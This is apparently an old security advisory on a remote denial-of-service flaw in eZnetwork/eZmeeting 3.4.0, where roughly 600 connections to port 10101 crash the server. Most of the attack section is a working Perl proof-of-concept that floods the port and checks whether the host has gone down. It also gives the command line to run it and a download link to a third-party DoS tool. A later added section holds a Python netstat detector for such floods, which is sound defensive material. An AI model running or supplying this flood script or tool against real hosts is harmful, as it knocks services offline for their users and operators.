Security Advisory

Vulnerability: Eznetwork multiple connections Denial of service

Packages   : "eZ34.exe" and "eZphoto1.2.1.EXE"
             + eZ
             + eZphotoshare
             + eZmeeting
             + eZnetwork
             + eZshare
Software   : www.eZmeeting.com [version 3.4.0]

eZnet Modules:
             SwServer: 1.153
             SwEzModule.dll: 1.72
             SwLoginModule.dll: 1.94
             SwMetaObjectModule.dll: 1.46
             SwProxyModule.dll: 1.35
             SwShareModule.dll: 1.90
             SwStatusModule.dll: 1.41
             SwTransferModule.dll: 1.172

Version    : 3.4.0 and prior
Vendor     : eZnetwork
Vendor Url : http://www.ezmeeting.com/Products.html
Bug Type   : Denial of service attack
Severity   : Medium--->remote crash
Severity   : medium
Author     : dr_insane , dr_insane@pathfinder.gr

#################################################
#################################################

1. Description

eZ:
---
"Imagine going to the movies, but instead of seeing the picture, someone had to describe it to you verbally. That's what's happening in countless business discussions and conference calls every day. A lot of time and money is being wasted. That's why we created eZ. Now imagine having the ability to place any document right in front of the person you’re speaking with on the phone, immediately - Word, Excel, PowerPoint, PDF, CAD, Digital Photos. Online. Real time. That's the power of eZ. Regardless of the distance that separates your team, eZ delivers an amazingly interactive, simple, visual workspace for all team players. If a picture paints a thousand words, think what an interactive picture can do for your business. Picture it with eZ."
- Vendor's Description

eZnetwork:
----------
"eZnetwork is a service that works hand in hand with the eZ desktop application. It allows users to connect with others (outside their Local Area Network) over the Internet, by using an eZ identity, or 'Friendly Name'. eZnetwork also allows users to host conferences and join conferences, even when one or more participants are located behind corporate firewalls, without compromising security."
- Vendor's Description

eZphotoshare:
-------------
"eZphotoshare is an amazing new way to share Digital Photos over the Internet with friends and family. Seeing is believing, download it today and interactively share digital photos anytime, anywhere. It's FREE for home use."
- Vendor's Description

2. Vulnerability Details

The vulnerability is caused by an error in the connection handling, which can be exploited to crash the server by establishing about 600 connections to port 10101.

By executing the following code against Ez.exe (port 10101) the server will crash:

-----------------------------------------------------------------
"C:\Perl\bin\perl5.6.1.exe "C:\kill_ez.pl" 127.0.0.1 10101 600" |
-----------------------------------------------------------------

#!/usr/bin/perl
use Strict;
use Socket;
use IO::Socket;

my $host = $ARGV[0];
my $port = $ARGV[1];
my $stop = $ARGV[2];
my $size = 1000;
my $prot = getprotobyname('tcp');
my $slep = $ARGV[3];

printf("================================================\n");
printf(" Eznetwork POC \n");
printf("================================================\n");
printf("[*] Making %d Connections To %s \n", $stop , $host);

for ($i=1; $i<$stop; $i++)
{
    socket($i, PF_INET, SOCK_STREAM, $prot );
    my $dest = sockaddr_in ($port, inet_aton($host));
    connect($i, $dest);
}

CheckServer($host, $i, $slep, $stop);
KillThreads($stop);
printf("[*] Exploit Attempt Unsuccesful");
exit;

sub CheckServer($host, $i, $slep, $stop)
{
    ($host, $i, $slep, $stop) = @_;
    $blank = "\015\012" x 2;
    $request = "GET / HTTP/1.0".$blank;
    $remote = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $host,
        PeerPort => $port,
        Timeout  => '10000',
        Type     => SOCK_STREAM,
    );
    print $remote $request;
    unless ( <$remote> )
    {
        printf("[*] Host %s Has Been Successfully DoS'ed\n", $host);
        printf("[*] The Host Will Be Down For %d Seconds\n", $slep);
        sleep($slep);
        KillThreads($stop);
        exit;
    }
}

sub KillThreads($stop)
{
    $stop = @_;
    printf("[*] Killing All active Connections");
    for ($l=1; $l<$stop; $l++)
    {
        shutdown($l,2)|| die("Couldn't Shut Down Socket");
        $l++;
    }
}

If you don't want to use this code you can download g0dzilla to test it:
http://members.lycos.co.uk/r34ct/main/godzillaDosTool/upgrade_to_v02.exe

Workaround: Use another product
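
Detection aid (added example, not part of the original advisory or the vendor's software): the crash depends on a large number of connections accumulating on port 10101, so counting open connections per remote address from `netstat -an` output gives early warning before the roughly 600 described above is reached. The alert threshold of 100 and the sample rows (documentation address ranges) are assumptions made for this example.

```python
import re
from collections import Counter

EZ_PORT = 10101          # port named in the advisory
ALERT_THRESHOLD = 100    # assumed alert level, well below the ~600 in the advisory
COUNTED_STATES = {"ESTABLISHED", "SYN_RECEIVED", "SYN_RECV"}

# TCP rows of `netstat -an`; the optional group skips Linux's two queue columns.
ROW = re.compile(
    r"^\s*tcp6?\s+(?:\d+\s+\d+\s+)?(?P<local>\S+)\s+(?P<remote>\S+)"
    r"\s+(?P<state>[A-Z_]+)\s*$",
    re.IGNORECASE,
)

def split_endpoint(endpoint):
    """Split 'addr:port' or '[v6addr]:port' into (addr, port)."""
    addr, _, port = endpoint.rpartition(":")
    return addr.strip("[]"), port

def connections_per_source(netstat_text, port=EZ_PORT):
    """Count open connections to the local service port, keyed by remote address."""
    counts = Counter()
    for line in netstat_text.splitlines():
        m = ROW.match(line)
        if not m or m.group("state").upper() not in COUNTED_STATES:
            continue
        if split_endpoint(m.group("local"))[1] != str(port):
            continue
        counts[split_endpoint(m.group("remote"))[0]] += 1
    return counts

def flooding_sources(netstat_text, port=EZ_PORT, threshold=ALERT_THRESHOLD):
    """Return {remote_addr: count} for sources at or above the threshold."""
    counts = connections_per_source(netstat_text, port)
    return {addr: n for addr, n in counts.items() if n >= threshold}

def build_sample():
    """Constructed netstat rows (documentation addresses), not captured data."""
    rows = ["  TCP    0.0.0.0:10101          0.0.0.0:0              LISTENING"]
    rows += [f"  TCP    192.0.2.10:10101       198.51.100.7:{40000 + i}    ESTABLISHED"
             for i in range(150)]
    rows += [f"  TCP    192.0.2.10:10101       203.0.113.5:{50000 + i}     ESTABLISHED"
             for i in range(3)]
    rows.append("  TCP    192.0.2.10:445         198.51.100.7:41000     ESTABLISHED")
    rows.append("  TCP    [::1]:10101            [::1]:51000            TIME_WAIT")
    return "\n".join(rows)

if __name__ == "__main__":
    for addr, n in flooding_sources(build_sample()).items():
        print(f"ALERT {addr}: {n} connections to port {EZ_PORT}")
```

Feed it the output of `netstat -an` collected on the host running the eZ server; a flagged address is a candidate for a firewall block or a per-source connection limit on port 10101.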